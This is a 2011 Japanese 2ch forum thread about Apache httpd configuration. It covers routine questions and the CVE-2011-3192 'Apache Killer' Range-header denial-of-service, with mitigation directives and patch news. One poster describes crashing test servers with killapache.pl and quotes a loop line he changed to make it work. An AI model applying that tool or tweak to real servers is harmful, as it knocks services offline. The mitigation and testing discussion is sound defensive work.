521:名無しさん@お腹いっぱい。
11/08/07 15:23:57.31
TCP keepaliveの説明を引用してくるバカがおる

522:名無しさん@お腹いっぱい。
11/08/07 17:14:40.13
フイタw

523:名無しさん@お腹いっぱい。
11/08/09 04:00:06.70
wgetで直アクセスすると404 Not Foundを返して来て、
telnetでアクセス(HEAD /some/foo/hoge.jpg HTTP/1.0)しても404を返してくるサーバがあります。
それなのに、chromeでアクセスすると画像が表示されます。

これってどういう設定なのでしょうか?
telnetやwgetでchromeと同じ結果を得るためには、どうアクセスするべきなのでしょうか?

524:509
11/08/09 10:40:40.07
UAとかホスト名指定とかじゃあ?

525:名無しさん@お腹いっぱい。
11/08/10 03:24:02.30
Referer の制限かなあ。
Chrome で見えるって言うのは、画像の URI を直接指定して?
こちらの紳士達が詳しいかも↓
スレリンク(unix板)l50

526:名無しさん@お腹いっぱい。
11/08/10 22:09:42.74
ホスト名やリファラによる制限はブラウザと関係ないし
ユーザエージェント制限の可能性があるけどその場合は404じゃんくて403だよね

527:名無しさん@お腹いっぱい。
11/08/10 23:46:51.84
何を返してくるかは相手次第だろうに403と決めてかかるとかw

528:名無しさん@お腹いっぱい。
11/08/11 00:04:53.56
403を404エラーとして返すサーバならそうだろうけど、わざわざそうする理由があるサーバということだよね?

529:名無しさん@お腹いっぱい。
11/08/11 10:41:31.12
ErrorDocumentを指定していてその先で404にすげ替えるとか。

530:名無しさん@お腹いっぱい。
11/08/11 12:15:38.68
>>528
軽い気持ちで404返してるかも知れないのにお前は何を言ってるんだ?

531:名無しさん@お腹いっぱい。
11/08/11 13:36:22.24
528は恥ずかしくてつい恥の上塗りでしょ


532:名無しさん@お腹いっぱい。
11/08/13 04:50:07.44
fc2とかリファラで404返してくるじゃん

533:名無しさん@お腹いっぱい。
11/08/18 10:42:17.44
違うドメイン名へのアクセスをエラーにしたいんだけど
どう設定したらいいかな。

chinkoサーバに URLリンク(unko) というアクセスがあったとき
200でなく404とか適切なエラーを返したい

534:名無しさん@お腹いっぱい。
11/08/18 10:43:51.16
VirtualHost

535:名無しさん@お腹いっぱい。
11/08/18 18:25:43.83
Hostヘッダーを見てはじけばいい

536:名無しさん@お腹いっぱい。
11/08/25 21:34:02.90
CVE-2011-3192
Range header DoS vulnerability Apache HTTPD 1.3/2.x


1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
either ignore the Range: header or reject the request.

Option 1: (Apache 2.0 and 2.2)

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range

対策してね。

537:名無しさん@お腹いっぱい。
11/08/25 22:01:49.96
【ニュー速ハッカー部】Apacheの脆弱性を突く「Apache Killer」 お前らのサーバの危険が危ない
スレリンク(news板)

538:名無しさん@お腹いっぱい。
11/08/25 23:31:09.77
赤帽パッチまだー( ゚д゚)
URLリンク(bugzilla.redhat.com)

539:名無しさん@お腹いっぱい。
11/08/26 10:04:21.25
お前らどころか2chが盛大に落とされたわけだが、他のサイトでは対策してあんのかな

540:名無しさん@お腹いっぱい。
11/08/26 11:57:53.46
2chが盛大に落ちたんだから他の奴等はこれはヤバいwと気づいて対策するだろうよ。
問題は2chが落ちた原因が ApacheKillerだと認識されてるかどうかだが。

2ch来てない奴には通用しないかも。ニュース系サイトでの取扱い鈍いし。

541:名無しさん@お腹いっぱい。
11/08/26 21:29:06.82
>>536
それ対策なってねーぞw

542:名無しさん@お腹いっぱい。
11/08/26 22:36:22.12
Apache HTTPD Security ADVISORY
==============================
UPDATE 2

なんてのを用意中ぽいな
workaroundも修正されとるでぇ
URLリンク(mail-archives.apache.org)

543:名無しさん@お腹いっぱい。
11/08/26 23:00:52.14
既にannounceに流れてた
URLリンク(mail-archives.apache.org)

ということで
>>536
はネタが古い

544:名無しさん@お腹いっぱい。
11/08/26 23:50:02.78
WAは検証して使えなかったから、ソース待ち
お前らちゃんと検証しろよな

545:名無しさん@お腹いっぱい。
11/08/27 09:17:11.02
>>543
あんまし困らないけどenv=bad-req-rangeの定義がないような気がする・・・。
SetEnvIf漏れ?

546:名無しさん@お腹いっぱい。
11/08/27 09:59:14.61
httpd-devはヲチっとけ

547:名無しさん@お腹いっぱい。
11/08/29 18:31:37.90
LoadModuleにある、mod_authxxxxxっていっぱいあるけど、
「使ってないぞコレ」と思ったらコメントアウトしてOK?

なんか気を付けることがあったらおしえてください。

548:名無しさん@お腹いっぱい。
11/08/29 18:50:36.98
まずはドキュメント読みなよ。

549:名無しさん@お腹いっぱい。
11/08/29 19:00:03.08
>548
一応Apacheのところを読んではいるんですが、
「××する機能」とはあるんですが、止めたら何が問題か?は書いてないですよね?

ノウハウっぽいところがあるのかな?と。

550:名無しさん@お腹いっぱい。
11/08/29 19:29:15.16
「××する機能」がいらないなら止めていいんじゃね。

551:名無しさん@お腹いっぱい。
11/08/29 19:43:26.29
全部コメントアウトして、動くようになるまで追加する。

552:名無しさん@お腹いっぱい。
11/08/29 19:46:34.21
モジュールのページを見ると
そのモジュールが提供するディレクティブ一覧が載ってる。
そのディレクティブを使ってなければたいていいらない。

553:名無しさん@お腹いっぱい。
11/08/29 21:15:45.17
>550-552
大体そんな方針で良いみたいですね

ある程度最初からonにしてあるのは利便性のタメかな?

554:名無しさん@お腹いっぱい。
11/08/29 23:02:41.02
ある程度というより、configure時にsharedで有効にしたものは全部onになってるぞ

555:名無しさん@お腹いっぱい。
11/08/30 11:10:26.12
apacheを使い始めたばかりの者ですが、よく分からないことがあります。

apacheのドキュメントルート直下に/cgi-bin/という名前のフォルダを作ると、
Forbiddenとなってしまい、それ以下のファイルを参照することが出来なくなってしまいます。
直下に/cgi-bin/を配置するのではなく、/test/cgi-bin/というようにワンクッション置けば参照できるようになります。
これは正常な動作なのでしょうか?
また、これが正常な動作である場合、ドキュメントルート直下に/cgi-bin/というフォルダを置いても
Forbiddenにならないようにするにはどのように設定を変更すればよいのでしょうか?

教えていただきたいです。

556:名無しさん@お腹いっぱい。
11/08/30 11:20:54.28
>>555
っ ScriptAlias

557:555
11/08/30 12:28:42.47
>>556
ありがとうございます。
つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね?
それでScriptAliasの設定が優先されるので、自分で作成した/cgi-bin/はForbiddenになってしまうと。

あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか?
cgi自体をダウンロードされたり表示されないようにするためだと記してあるサイトが多いようですが、
ScriptAliasに置かなくてもcgiにアクセスしたら、結局はプログラムが実行された後の結果しか与えられないと考えていたのですが。
ScriptAliasで設定したディレクトリ以外に置かれたcgiというのは、その中身が簡単にみられてしまったりするのでしょうか?

558:名無しさん@お腹いっぱい。
11/08/30 13:28:23.86
>>557
> つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね?
ScriptAlias の指定が優先されてドキュメントルートの方の /cgi-bin/ は参照されない。

> あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか?
一ヶ所に集めておくと管理しやすい。
あやしいプログラムをユーザに勝手に置かれるのを防ぐ。

559:555
11/08/30 14:09:15.85
>>558
解説ありがとうございます。

>あやしいプログラムをユーザに勝手に置かれるのを防ぐ。

これはつまりセキュリティの事を考慮すると、cgiはScriptAliasで設定したディレクトリに置いた方がよいということですよね。

この質問とは別のことになりますが、例えばページの管理者だけが使用することを目的としたcgiを作成した場合、
ドキュメントルート下にhtaccessの設定でBasic認証を有効にしたディレクトリにそのcgiを置くよりも、
ScriptAliasで設定したディレクトリにそのcgiを置いた方がセキュリティ面では良いということになるのでしょうか?

560:名無しさん@お腹いっぱい。
11/08/30 14:21:51.67
>>559
管理しきれるならどこに置いてもいいんじゃね。

あと、自分と同じディレクトリにデータファイルを作るようなプログラムがあった場合に
ScriptAlias 以下ならそのファイルを覗かれることがない、っていう利点もあるにはある。
副次的な効果だけど。
そんなプログラム作る方が悪いんだけど。

561:555
11/08/30 14:34:43.13
>>560

とりあえず、初心者なのでScriptAliasで設定したディレクトリにcgiを集めることにしてみます。

お答えくださってありがとうございました。

562:名無しさん@お腹いっぱい。
11/08/30 14:46:50.14
URLリンク(httpd.apache.org)

563:名無しさん@お腹いっぱい。
11/08/31 10:38:02.43
2.2.20


564:名無しさん@お腹いっぱい。
11/08/31 11:02:44.56
早速上げたった。
テストは面倒だからしてない(・∀・)y‐┛~~

565:名無しさん@お腹いっぱい。
11/08/31 14:52:22.61
1.3系使ってる人はどうするの?
まだまだ沢山いると思うんだけど...

566:名無しさん@お腹いっぱい。
11/08/31 15:02:26.97
いいかげん 2.x に乗り換えれ。

567:名無しさん@お腹いっぱい。
11/08/31 15:06:53.44
自分のサーバーなら2.2系使ってるんだけどね...
仕事先のだとなかなか...

568:名無しさん@お腹いっぱい。
11/08/31 15:07:58.37
1.3系のパッチの予定はないのかな?

569:名無しさん@お腹いっぱい。
11/08/31 17:54:52.56
ないよ。

570:名無しさん@お腹いっぱい。
11/08/31 23:31:26.50
赤帽バッチまだー
>>538

571:名無しさん@お腹いっぱい。
11/09/01 03:47:35.52
2.2.20速いぞ

572:名無しさん@お腹いっぱい。
11/09/01 10:45:44.80
>>570
来たよ。
URLリンク(rhn.redhat.com)

573:名無しさん@お腹いっぱい。
11/09/01 11:18:40.39
2.0系のパッチの予定はないのかな?

574:名無しさん@お腹いっぱい。
11/09/01 11:40:51.42
自分でバックポートしれ そして配布しれ

575:名無しさん@お腹いっぱい。
11/09/01 12:11:51.87
>>573
RHEL4.xのパッチをパクればOK

576:名無しさん@お腹いっぱい。
11/09/01 12:29:35.32
2.0.x は出す
1.3.x は出さないと言ってた気がする

577:名無しさん@お腹いっぱい。
11/09/01 12:39:32.05
早い対応、めでたし。
今回の脆弱性で実際に攻撃を受けたってサイトはあるの?

578:名無しさん@お腹いっぱい。
11/09/01 13:12:44.86
>>577
2ch とか?

579:名無しさん@お腹いっぱい。
11/09/01 13:15:49.58
>>574>>575
非公式な対応はいろいろあるけど、
公式に出ないのかな、と思って。

580:名無しさん@お腹いっぱい。
11/09/01 14:41:38.01
URLリンク(ftp.redhat.com)

581:名無しさん@お腹いっぱい。
11/09/01 14:43:16.08
>>580
とつぜんどうしたの。

582:名無しさん@お腹いっぱい。
11/09/01 14:48:35.43
ウフフ

583:名無しさん@お腹いっぱい。
11/09/01 18:50:37.25
Apache Killerの件で
落としてみて報告してくれと無茶ぶりされて、
必死こいて頑張っていますが、
killapache.pl を使って、
1.3.xでは落ちません。
2.2.xでは落ちました。
変な話ですが、1.3.xで落とせた方はいらっしゃいますか?


584:名無しさん@お腹いっぱい。
11/09/01 20:19:33.78
つまり1.3最強という事ですね。

585:名無しさん@お腹いっぱい。
11/09/01 20:26:28.53
1.3はinetdモード使えるから今でも重宝してる

586:名無しさん@お腹いっぱい。
11/09/01 20:35:48.51
>>585
なんでinetdモード使ってるの?

587:名無しさん@お腹いっぱい。
11/09/01 20:38:22.72
ちゃんとプロセス数増やしてメモリ潰さないと止まらないっしょ

588:名無しさん@お腹いっぱい。
11/09/01 21:50:55.78
>>586
TCP Wrapper が使いたいとか?

589:名無しさん@お腹いっぱい。
11/09/01 22:15:07.02
>>583
ここが参考になるかも
URLリンク(blog.tokumaru.org)

590:名無しさん@お腹いっぱい。
11/09/01 22:40:19.55
583です。
MaxClientsを下げて10にしましたが、ビクともしません。
そもそもkillapache.plの
28行目 for ($k=0;$k<1300;$k++) {

for ($k=5;$k<1300;$k++) {
としないと
206 Partial Content
が返りませんでした。200が返りました。
2.2.xでは、何もしなくても206が返りました。
再現方法が違うのでしょうか?


591:名無しさん@お腹いっぱい。
11/09/01 22:45:57.52
>>590
URLリンク(people.apache.org)

592:名無しさん@お腹いっぱい。
11/09/01 23:09:15.40
>>591
583です。

そんな今さら・・・

Apache 1.3 is NOT vulnerable.
えっ!?

UPDATE2までしか見ていませんでした。
ありがとうございました!

593:名無しさん@お腹いっぱい。
11/09/01 23:40:13.17
わかりました。apache_1.3.42 に戻します。

594:名無しさん@お腹いっぱい。
11/09/02 01:22:26.29
1.3系試してないねぇ
URLリンク(www.jpcert.or.jp)

595:名無しさん@お腹いっぱい。
11/09/02 08:36:48.74
え?1.3系は大丈夫だったの?

596:名無しさん@お腹いっぱい。
11/09/03 12:23:58.91
URLリンク(huge.shit.com) -> 200 OK
URLリンク(huge.shit.com) -> 404 Not Found
URLリンク(<)<)上記ドメインのIP>/test.php?param=xxx -> 200 OK

Virtualhostへのアクセスで存在するファイルにGETパラメータを渡すと404になる。
こんな現象に悩まされてるんだけど、これなんで?誰か教えて!

597:名無しさん@お腹いっぱい。
11/09/03 12:39:44.97
ログ読んでみたら。

598:名無しさん@お腹いっぱい。
11/09/03 12:45:11.61
ログは File is not found が並んでるだけなんだよね。
ていうか、パラメータ渡すと not found になる設定ってあるのかな。
昨日まで正常だったのに、いきなりこの現象が発生してわけわからんのです。

599:名無しさん@お腹いっぱい。
11/09/03 13:44:17.55
何も変更してないならrestartしてみたら?

600:名無しさん@お腹いっぱい。
11/09/03 13:48:55.99
restartはしたんすよ。変わらずです。
おれ以外にも管理者はいるから誰かが
何かを書き換えた可能性はなくはないんだよね。
?でパラメータ渡すと別ファイルとして認識されちゃうってことだよね多分これ。

601:名無しさん@お腹いっぱい。
11/09/03 14:14:14.82
書き換えた人に聞いた方が早くない?
confの日付で実際更新されてるか分かるだろうし。

602:名無しさん@お腹いっぱい。
11/09/03 14:21:53.08
>>596

Rewrite使ってる?
Apache Killerの件で設定変えたとか。

603:名無しさん@お腹いっぱい。
11/09/03 15:36:13.73
>>602
Rewriteは、してないね。
killapache対策はしたけど、数日前なので、タイミングは合致しないなー。

604:名無しさん@お腹いっぱい。
11/09/03 15:45:48.19
POSTした場合はどうなりますか?

605:名無しさん@お腹いっぱい。
11/09/03 16:34:37.48
普通設定いじる前にバックアップとらない?
diffすればいいんじゃない?

606:名無しさん@お腹いっぱい。
11/09/03 16:57:16.34
>> 601
誰が何を変更したのかがわかる状況ではないんだよね。confの更新日はkillapache対策の時だね。昨日じゃない。
ためしにRange周りの設定をオフってみたけど関係ないみたい。
>> 604
FirefoxのHackbarってアドオン使ってPOSTしてみた限りでは問題なかべおん。
てかさ、
/js/jquery.js
だとアクセスできて
/js/jqueyr.js?test
でNot Foundになるってどおゆうことなんだろう。んなことある?

607:名無しさん@お腹いっぱい。
11/09/03 18:53:08.15
>>606

違うブラウザではどんな?同じ動作?

608:名無しさん@お腹いっぱい。
11/09/03 19:19:20.79
>>606
うだうだ書いてるヒマあったら他の管理者どもに話を訊けよアホ
あと設定ファイルの変更履歴とれやボケ

609:名無しさん@お腹いっぱい。
11/09/03 19:35:31.64
まずは管理体制の見直しからだな。

610:名無しさん@お腹いっぱい。
11/09/03 19:37:16.20
これを機にIISに切り替えよう。

611:名無しさん@お腹いっぱい。
11/09/03 22:37:24.77
>>607
どのブラウザでも一緒だね。
IP直打ちとVirtualHostで動作が違うってのがポイントだと思ってずっと調べてるけど、未だ解決できず。
>>608
confに変更はない。他の管理者は連絡とれず。やーここの人なら「そりゃおめー原因はあれだよ」ってなるかなと
思ってさ。自力で調べつつ、わらにもすがる思いで聞いとります。

612:名無しさん@お腹いっぱい。
11/09/03 23:28:57.17
>>611
config晒せば。

何らかの意図があって設定を変更しているのなら
設定を戻せば良いって話でもない気がするけど。

613:名無しさん@お腹いっぱい。
11/09/03 23:43:40.87
>>611

>IP直打ちとVirtualHostで動作が違うってのがポイントだと思ってずっと調べてるけど、未だ解決できず。
そこじゃないかもしれんぞな。

/js/jqueyr.js?test
↑↑↑↑
尻尾つきで、POSTするとどない?エラー?



614:名無しさん@お腹いっぱい。
11/09/04 00:07:46.90
>>613
こんな結果です。
[尻尾あり]
URLリンク(xxx.example.com)
POST /js/jquery.js?test HTTP/1.1
HTTP/1.1 404 Not Found
[尻尾なし]
URLリンク(xxx.example.com)
POST /js/jquery.js HTTP/1.1
HTTP/1.1 200 OK

615:名無しさん@お腹いっぱい。
11/09/04 00:42:20.85
>>614

POSTとGET関係ないと。

VirtualHostとの時だけ変なら、
試しに、違うドメインを追加(VirtualHost)して、そっちでも変になりますか?

差し障り範囲(ドメインとか、IPとかXXXして)で、confを見せていただけると、何か分かるかもね。
apacheバージョンとか、組み込んでるモジュールとか




616:名無しさん@お腹いっぱい。
11/09/06 07:41:07.60
遅ればせながらapache killer対策に取りかかっています
巨大なファイルを扱っていない限りrangeヘッダに非対応でもいいので

RequestHeader unset Range
RequestHeader unset Request-Range

二行追加でよろしいでしょうか?

617:名無しさん@お腹いっぱい。
11/09/06 08:16:43.48
バージョンチェックも入れました

<IfVersion < 2.2.20>
RequestHeader unset Range

RequestHeader unset Request-Range
</IfVersion>


618:名無しさん@お腹いっぱい。
11/09/06 14:25:04.79
話の流れに割り込むような形になってしまい申し訳ありませんが、Apache初心者の質問をさせてください。

Apacheにおける環境変数QUERY_STRINGの呼び出しに関する質問です。

Apache上に置いてあるshtml内にGETメソッドのフォームを設置しています。
フォームのテキストボックス内に日本語で文字を入力してsubmitボタンを押し、
新しく表示されたshtml内でSSIを使用して、cgiで環境変数QUERY_STRINGをshtml内に表示しようとしています。

テキストボックスに何も入力しない場合や半角英数字のみを入力した場合は正しく習得され、
cgiによってshtml内に環境変数QUERY_STRINGのデータがしっかりと表示されるのですが、
テキストボックス内に日本語を入力した場合は、shtml内に環境変数QUERY_STRINGの中身が
何もない状態であるかのように表示されてしまいます。つまり、『?』以降が何も表示されないということです。
しかし、テキストボックス内に日本語を入力した場合でも、新しく表示されたshtmlのURLには入力した文字データが
GETメソッドとして正常に受け取られているように表示されています。

AN HTTPDで全く同じshtmlおよびcgiを使用した場合は、日本語を入力してもshtml内にその結果が正しく表示されるので、
Apache内の何かが原因であるのではないかなと考えているのですが、よく分かりません。

お分かりになる方おられましたら、どうかよろしくお願いします。

619:名無しさん@お腹いっぱい。
11/09/06 15:35:20.59
謙譲語・・

620:名無しさん@お腹いっぱい。
11/09/06 18:18:46.32
それはわかっておりますw

shtmlがUTF-8じゃないんだろw

621:名無しさん@お腹いっぱい。
11/09/06 21:31:32.29
>>598
LogLevel debug を設定したらヒントが出るかもしれない。

622:名無しさん@お腹いっぱい。
11/09/06 21:36:14.32
連投ですまん。
あと、>>596 を見て思うのは、
huge.shit.com/test.php?param=xxx のときは
"test.php?param=xxx" というファイルを探しに行ってるんじゃないかと・・・

まぁ、バーチャルホスト内の設定のどこかがおかしいんだろう。
あとは .htaccess が置いてあったりとか。

623:618
11/09/07 01:01:45.37
>>620

おっしゃるとおり、shtmlはUTF-8ではなくShift_JISで作成したものです。
UTF-8のページにしたところ、日本語のデータを表示することができました。
ありがとうございました。

GETを受けるページがUTF-8でなければならないのは、Apacheの仕様なのですか?
Shift_JISでも表示できるように、設定で変更することなどは可能ですか?
AN HTTPDではshtmlがShift-JISで書かれていてもちゃんと表示されていたので、
Apacheだとなぜ表示されないのかよく分からないのですが・・・。

624:名無しさん@お腹いっぱい。
11/09/07 11:43:32.18
>>622

?が全角

625:名無しさん@お腹いっぱい。
11/09/07 12:34:26.14
まさかぁ。

626:名無しさん@お腹いっぱい。
11/09/12 16:53:37.17
>>596
その後どうよ。

627:名無しさん@お腹いっぱい。
11/09/13 14:52:27.40
2.2.21とな

628:名無しさん@お腹いっぱい。
11/09/13 16:36:44.83
Apache Killerの余韻はこの辺か > 2.2.21

*) Fix a regression introduced by the CVE-2011-3192 byterange fix in 2.2.20.
PR 51748. [<lowprio20 gmail.com>]

*) core: Allow MaxRanges none|unlimited|default and set 'Accept-Ranges: none'
in the case Ranges are being ignored with MaxRanges none.
[Eric Covener]


629:名無しさん@お腹いっぱい。
11/09/20 12:59:10.14
こんにちは。質問させてください。

お名前.comでドメイン取得
さくらvpsを契約し

var/www/html/rails_app/public
をドキュメントとして
URLリンク(example.com)<)
にアクセスしたときだけ
phpmyadminが表示されるようにするには
どのような設定をすればいいでしょうか?

630:名無しさん@お腹いっぱい。
11/09/20 13:16:50.42
スレリンク(linux板:407番)
の人?

631:名無しさん@お腹いっぱい。
11/09/23 16:36:44.12
ソースからRPMを作ろうとしています
ソース同梱のspecファイル中に
# symlinks for /etc/httpd
とあって、logやrunやmodulesのシンボリックリンクを作ってるんですが
/etc/httpd配下にそんなシンボリックリンクいらなくないですか?
どういう意味があるんでしょうか

632:名無しさん@お腹いっぱい。
11/09/23 18:05:23.72
>>631
いらないと思うなら作る必要はない。
歴史的に /etc 配下に設定ファイルを集めているだけ
/etc の配下に httpd があれば、設定ファイルを探しやすいってだけだ

/usr/local/httpd とかに全部入れる人だっているんだし
自分だけが触るなら別に何でも良いじゃないの?

他人が触るなら /etc/httpd があった方が、親切


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch